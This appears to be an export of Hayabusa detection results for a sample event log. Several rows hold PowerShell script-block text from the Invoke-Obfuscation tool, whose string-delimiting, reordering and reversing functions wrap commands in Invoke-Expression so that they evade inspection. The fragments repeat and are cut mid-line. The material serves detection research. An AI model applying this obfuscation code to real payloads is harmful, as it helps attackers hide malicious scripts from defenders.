.EXAMPLE C:\PS> Out-StringDelimitedAndConcatenated ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" (('Write-Ho'+'s'+'t'+' {'+'0'+'}'+'Hell'+'o Wor'+'l'+'d!'+'{'+'0'+'} -Foreground'+'Color G'+'ree'+'n; Writ'+'e-'+'H'+'ost {0}Obf'+'usc'+'a'+'tion R'+'o'+'ck'+'s!{'+'0} -Fo'+'reg'+'ro'+'undColor'+' '+'Gree'+'n')-F[Char]39) | Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) # Characters we will substitute (in random order) with randomly generated delimiters. $CharsToReplace = @('$','|','`','\','""',""'"") $CharsToReplace = (Get-Random -Input $CharsToReplace -Count $CharsToReplace.Count) # If $ScriptString does not contain any characters in $CharsToReplace then simply return as is. $ContainsCharsToReplace = $FALSE ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { $ContainsCharsToReplace = $TRUE Break } } If(!$ContainsCharsToReplace) { # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' If(!$PSBoundParameters['PassThru']) { # Encapsulate in necessary IEX/Invoke-Expression(s). 
$ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } # Characters we will use to generate random delimiters to replace the above characters. # For simplicity do NOT include single- or double-quotes in this array. $CharsToReplaceWith = @(0..9) $CharsToReplaceWith += @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $CharsToReplaceWith += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') $DelimiterLength = 3 # Multi-dimensional table containing delimiter/replacement key pairs for building final command to reverse substitutions. $DelimiterTable = @() # Iterate through and replace each character in $CharsToReplace in $ScriptString with randomly generated delimiters. ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { # Create random delimiter of length $DelimiterLength with characters from $CharsToReplaceWith. If($CharsToReplaceWith.Count -lt $DelimiterLength) {$DelimiterLength = $CharsToReplaceWith.Count} $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' # Keep generating random delimiters until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($Delim.ToLower())) { $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' If($DelimiterLength -lt $CharsToReplaceWith.Count) { $DelimiterLength++ } } # Add current delimiter/replacement key pair for building final command to reverse substitutions. $DelimiterTable += , @($Delim,$CharToReplace) # Replace current character to replace with the generated delimiter $ScriptString = $ScriptString.Replace($CharToReplace,$Delim) } } # Add random quotes to delimiters in $DelimiterTable. 
$DelimiterTableWithQuotes = @() ForEach($DelimiterArray in $DelimiterTable) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly choose between a single quote and double quote. $RandomQuote = Get-Random -InputObject @(""'"",""`"""") # Make sure $RandomQuote is opposite of $OriginalChar contents if it is a single- or double-quote. If($OriginalChar -eq ""'"") {$RandomQuote = '""'} Else {$RandomQuote = ""'""} # Add quotes. $Delimiter = $RandomQuote + $Delimiter + $RandomQuote $OriginalChar = $RandomQuote + $OriginalChar + $RandomQuote # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes += , @($Delimiter,$OriginalChar) } # Reverse the delimiters when building back out the reversing command. [Array]::Reverse($DelimiterTable) # Select random method for building command to reverse the above substitutions to execute the original command. # Avoid using the -f format operator (switch option 3) if curly braces are found in $ScriptString. If(($ScriptString.Contains('{')) -AND ($ScriptString.Contains('}'))) { $RandomInput = Get-Random -Input (1..2) } Else { $RandomInput = Get-Random -Input (1..3) } # Randomize the case of selected variable syntaxes. $StringStr = Out-RandomCase 'string' $CharStr = Out-RandomCase 'char' $ReplaceStr = Out-RandomCase 'replace' $CReplaceStr = Out-RandomCase 'creplace' Switch($RandomInput) { 1 { # 1) .Replace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- and double-quote. 
If($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$StringStr][$CharStr]39"" $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } ElseIf($OriginalChar[1] -eq '""') { $OriginalChar = ""[$StringStr][$CharStr]34"" } Else { If(Get-Random -Input (0..1)) { $OriginalChar = ""[$StringStr][$CharStr]"" + [Int][Char]$OriginalChar[1] } } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Delimiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Add reversing commands to $ReversingCommand. $ReversingCommand = "".$ReplaceStr($Delimiter,$OriginalChar)"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = $ScriptString + $ReversingCommand } 2 { # 2) -Replace/-CReplace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. 
If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Del",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.249 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"imiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Randomly choose between -Replace and the lesser-known case-sensitive -CReplace. $Replace = (Get-Random -Input @(""-$ReplaceStr"",""-$CReplaceStr"")) # Add reversing commands to $ReversingCommand. Whitespace before and after $Replace is optional. $ReversingCommand = ' '*(Get-Random -Minimum 0 -Maximum 3) + $Replace + ' '*(Get-Random -Minimum 0 -Maximum 3) + ""$Delimiter,$OriginalChar"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. 
$ScriptString = '(' + $ScriptString + $ReversingCommand + ')' } 3 { # 3) -f format operator $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" $Counter = 0 # Iterate delimiters in reverse for simpler creation of the proper order for $ReversingCommand. For($i=$DelimiterTableWithQuotes.Count-1; $i -ge 0; $i--) { $DelimiterArray = $DelimiterTableWithQuotes[$i] $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] $DelimiterNoQuotes = $Delimiter.SubString(1,$Delimiter.Length-2) # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Build out delimiter order to add as arguments to the final -f format operator. $ReversingCommand = $ReversingCommand + "",$OriginalChar"" # Substitute each delimited character with placeholder for -f format operator. $ScriptString = $ScriptString.Replace($DelimiterNoQuotes,""{$Counter}"") $Counter++ } # Trim leading comma from $ReversingCommand. $ReversingCommand = $ReversingCommand.Trim(',') # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. Whitespace before and after -f format operator is optional. 
$FormatOperator = (Get-Random -Input @('-f','-F')) $ScriptString = '(' + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + $FormatOperator + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ReversingCommand + ')' } default {Write-Error ""An invalid `$RandomInput value ($RandomInput) was passed to switch block.""; Exit;} } # Encapsulate $ScriptString in necessary IEX/Invoke-Expression(s) if -PassThru switch was not specified. If(!$PSBoundParameters['PassThru']) { $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } Function Out-StringDelimitedConcatenatedAndReordered { <# .SYNOPSIS Generates delimited, concatenated and reordered version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedConcatenatedAndReordered Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedConcatenatedAndReordered delimits, concatenates and reorders the concatenated substrings of an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedConcatenatedAndReordered ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green"" ((""{16}{5}{6}{14}{3}{19}{15}{10}{18}{17}{0}{2}{7}{8}{12}{9}{11}{4}{13}{1}""-f't','en','ion R','9 -Fore','Gr','e-Host 0i9Hello W','or','ocks!0i9 -Fo','regroun','olo','ite-Hos','r ','dC','e','ld!0i','; Wr','Writ','sca','t 0i9Obfu','groundColor Green')).Replace('0i9',[String][Char]39) |IEX .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) If(!$PSBoundParameters['PassThru']) { # Convert $ScriptString to delimited and concatenated string and encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString } Else { # Convert $ScriptString to delimited and concatenated string and do no encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString -PassThru } # Parse out concatenated strings to re-order them. 
$Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $GroupStartCount = 0 $ConcatenatedStringsIndexStart = $NULL $ConcatenatedStringsIndexEnd = $NULL $ConcatenatedStringsArray = @() For($i=0; $i -le $Tokens.Count-1; $i++) { $Token = $Tokens[$i] If(($Token.Type -eq 'GroupStart') -AND ($Token.Content -eq '(')) { $GroupStartCount = 1 $ConcatenatedStringsIndexStart = $Token.Start+1 } ElseIf(($Token.Type -eq 'GroupEnd') -AND ($Token.Content -eq ')') -OR ($Token.Type -eq 'Operator') -AND ($Token.Content -ne '+')) { $GroupStartCount-- $ConcatenatedStringsIndexEnd = $Token.Start # Stop parsing concatenated string. If(($GroupStartCount -eq 0) -AND ($ConcatenatedStringsArray.Count -gt 0)) { Break } } ElseIf(($GroupStartCount -gt 0) -AND ($Token.Type -eq 'String')) { $ConcatenatedStringsArray += $Token.Content } ElseIf($Token.Type -ne 'Operator') { # If something other than a string or operator appears then we're not dealing with a pure string concatenation. Thus we reset the group start and the concatenated strings array. # This only became an issue once the invocation syntax went from IEX/Invoke-Expression to concatenations like .($ShellId[1]+$ShellId[13]+'x') $GroupStartCount = 0 $ConcatenatedStringsArray = @() } } $ConcatenatedStrings = $ScriptString.SubString($ConcatenatedStringsIndexStart,$ConcatenatedStringsIndexEnd-$ConcatenatedStringsIndexStart) # Return $ScriptString as-is if there is only one substring as it would gain nothing to ""reorder"" a single substring. If($ConcatenatedStringsArray.Count -le 1) { Return $ScriptString } # Randomize the order of the concatenated strings. 
$RandomIndexes = (Get-Random -Input (0..$($ConcatenatedStringsArray.Count-1)) -Count $ConcatenatedStringsArray.Count) $Arguments1 = '' $Arguments2 = @('')*$ConcatenatedStringsArray.Count For($i=0; $i -lt $ConcatenatedStringsArray.Count; $i++) { $RandomIndex = $RandomIndexes[$i] $Arguments1 += '{' + $RandomIndex + '}' $Arguments2[$RandomIndex] = ""'"" + $ConcatenatedStringsArray[$i] + ""'"" } # Whitespace is not required before or after the -f operator. $ScriptStringReordered = '(' + '""' + $Arguments1 + '""' + ' '*(Get-Random @(0..1)) + '-f' + ' '*(Get-Random @(0..1)) + ($Arguments2 -Join ',') + ')' # Add re-ordered $ScriptString back into the original $ScriptString context. $ScriptString = $ScriptString.SubString(0,$ConcatenatedStringsIndexStart) + $ScriptStringReordered + $ScriptString.SubString($ConcatenatedStringsIndexEnd) Return $ScriptString } Function Out-StringReversed { <# .SYNOPSIS Generates concatenated and reversed version of input PowerShell command. Invoke-Obfuscation Function: Out-StringReversed Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString, Out-RandomCase (both are located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringReversed concatenates and reverses an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-StringReversed ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green"" sv 6nY (""XEI | )93]rahC[ f-)'n'+'eer'+'G'+' roloC'+'dnuo'+'rgeroF-'+' '+'}0{!sk'+'co'+'R '+'noitacsufb'+'O'+'}0'+'{ ts'+'oH-'+'etirW ;neer'+'G'+' rolo'+'C'+'dnu'+'orgeroF- }0{!d'+'l'+'roW'+' olleH}0{ tsoH-et'+'ir'+'W'(( "");IEX ( ( gcI vARiaBlE:6ny ).valUE[ -1..-( ( gcI vARiaBlE:6ny ).valUE.Length ) ]-Join '' ) .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # Remove any special characters to simplify dealing with the reversed $ScriptString on the command line. $ScriptString = Out-ObfuscatedStringCommand ([ScriptBlock]::Create($ScriptString)) 1 # Reverse $ScriptString. $ScriptStringReversed = $ScriptString[-1..-($ScriptString.Length)] -Join '' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. 
If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Placeholder for values to be SET in variable differently in each Switch statement below. $RandomVarValPlaceholder = '<[)(]>' # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. 
$RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += '$OFS' + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""''"" $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize the case of selected variable syntaxes. 
$SetOfsVar = Out-RandomCase $SetOfsVar $SetOfsVarBack = Out-RandomCase $SetOfsVarBack $StringStr = Out-RandomCase 'string' $JoinStr = Out-RandomCase 'join' $LengthStr = Out-RandomCase 'length' $ArrayStr = Out-RandomCase 'array' $ReverseStr = Out-RandomCase 'reverse' $CharStr = Out-RandomCase 'char' $RightToLeftStr = Out-RandomCase 'righttoleft' $RegexStr = Out-RandomCase 'regex' $MatchesStr = Out-RandomCase 'matches' $ValueStr = Out-RandomCase 'value' $ForEachObject = Out-Rand",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.249 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"imiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Randomly choose between -Replace and the lesser-known case-sensitive -CReplace. $Replace = (Get-Random -Input @(""-$ReplaceStr"",""-$CReplaceStr"")) # Add reversing commands to $ReversingCommand. Whitespace before and after $Replace is optional. $ReversingCommand = ' '*(Get-Random -Minimum 0 -Maximum 3) + $Replace + ' '*(Get-Random -Minimum 0 -Maximum 3) + ""$Delimiter,$OriginalChar"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = '(' + $ScriptString + $ReversingCommand + ')' } 3 { # 3) -f format operator $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" $Counter = 0 # Iterate delimiters in reverse for simpler creation of the proper order for $ReversingCommand. 
For($i=$DelimiterTableWithQuotes.Count-1; $i -ge 0; $i--) { $DelimiterArray = $DelimiterTableWithQuotes[$i] $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] $DelimiterNoQuotes = $Delimiter.SubString(1,$Delimiter.Length-2) # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Build out delimiter order to add as arguments to the final -f format operator. $ReversingCommand = $ReversingCommand + "",$OriginalChar"" # Substitute each delimited character with placeholder for -f format operator. $ScriptString = $ScriptString.Replace($DelimiterNoQuotes,""{$Counter}"") $Counter++ } # Trim leading comma from $ReversingCommand. $ReversingCommand = $ReversingCommand.Trim(',') # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. Whitespace before and after -f format operator is optional. $FormatOperator = (Get-Random -Input @('-f','-F')) $ScriptString = '(' + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + $FormatOperator + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ReversingCommand + ')' } default {Write-Error ""An invalid `$RandomInput value ($RandomInput) was passed to switch block.""; Exit;} } # Encapsulate $ScriptString in necessary IEX/Invoke-Expression(s) if -PassThru switch was not specified. 
If(!$PSBoundParameters['PassThru']) { $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } Function Out-StringDelimitedConcatenatedAndReordered { <# .SYNOPSIS Generates delimited, concatenated and reordered version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedConcatenatedAndReordered Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedConcatenatedAndReordered delimits, concatenates and reorders the concatenated substrings of an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedConcatenatedAndReordered ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" ((""{16}{5}{6}{14}{3}{19}{15}{10}{18}{17}{0}{2}{7}{8}{12}{9}{11}{4}{13}{1}""-f't','en','ion R','9 -Fore','Gr','e-Host 0i9Hello W','or','ocks!0i9 -Fo','regroun','olo','ite-Hos','r ','dC','e','ld!0i','; Wr','Writ','sca','t 0i9Obfu','groundColor Green')).Replace('0i9',[String][Char]39) |IEX .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) If(!$PSBoundParameters['PassThru']) { # Convert $ScriptString to delimited and concatenated string and encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString } Else { # Convert $ScriptString to delimited and concatenated string and do no encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString -PassThru } # Parse out concatenated strings to re-order them. $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $GroupStartCount = 0 $ConcatenatedStringsIndexStart = $NULL $ConcatenatedStringsIndexEnd = $NULL $ConcatenatedStringsArray = @() For($i=0; $i -le $Tokens.Count-1; $i++) { $Token = $Tokens[$i] If(($Token.Type -eq 'GroupStart') -AND ($Token.Content -eq '(')) { $GroupStartCount = 1 $ConcatenatedStringsIndexStart = $Token.Start+1 } ElseIf(($Token.Type -eq 'GroupEnd') -AND ($Token.Content -eq ')') -OR ($Token.Type -eq 'Operator') -AND ($Token.Content -ne '+')) { $GroupStartCount-- $ConcatenatedStringsIndexEnd = $Token.Start # Stop parsing concatenated string. If(($GroupStartCount -eq 0) -AND ($ConcatenatedStringsArray.Count -gt 0)) { Break } } ElseIf(($GroupStartCount -gt 0) -AND ($Token.Type -eq 'String')) { $ConcatenatedStringsArray += $Token.Content } ElseIf($Token.Type -ne 'Operator') { # If something other than a string or operator appears then we're not dealing with a pure string concatenation. Thus we reset the group start and the concatenated strings array. 
# This only became an issue once the invocation syntax went from IEX/Invoke-Expression to concatenations like .($ShellId[1]+$ShellId[13]+'x') $GroupStartCount = 0 $ConcatenatedStringsArray = @() } } $ConcatenatedStrings = $ScriptString.SubString($ConcatenatedStringsIndexStart,$ConcatenatedStringsIndexEnd-$ConcatenatedStringsIndexStart) # Return $ScriptString as-is if there is only one substring as it would gain nothing to ""reorder"" a single substring. If($ConcatenatedStringsArray.Count -le 1) { Return $ScriptString } # Randomize the order of the concatenated strings. $RandomIndexes = (Get-Random -Input (0..$($ConcatenatedStringsArray.Count-1)) -Count $ConcatenatedStringsArray.Count) $Arguments1 = '' $Arguments2 = @('')*$ConcatenatedStringsArray.Count For($i=0; $i -lt $ConcatenatedStringsArray.Count; $i++) { $RandomIndex = $RandomIndexes[$i] $Arguments1 += '{' + $RandomIndex + '}' $Arguments2[$RandomIndex] = ""'"" + $ConcatenatedStringsArray[$i] + ""'"" } # Whitespace is not required before or after the -f operator. $ScriptStringReordered = '(' + '""' + $Arguments1 + '""' + ' '*(Get-Random 